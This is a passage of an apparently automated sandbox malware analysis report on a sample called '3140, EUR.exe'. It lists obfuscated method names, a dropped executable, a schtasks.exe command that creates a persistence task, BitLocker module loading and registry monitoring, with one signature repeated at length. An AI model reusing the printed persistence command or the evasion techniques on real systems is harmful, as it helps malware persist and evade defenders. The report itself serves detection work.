Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Drops PE files
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\3140, EUR.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
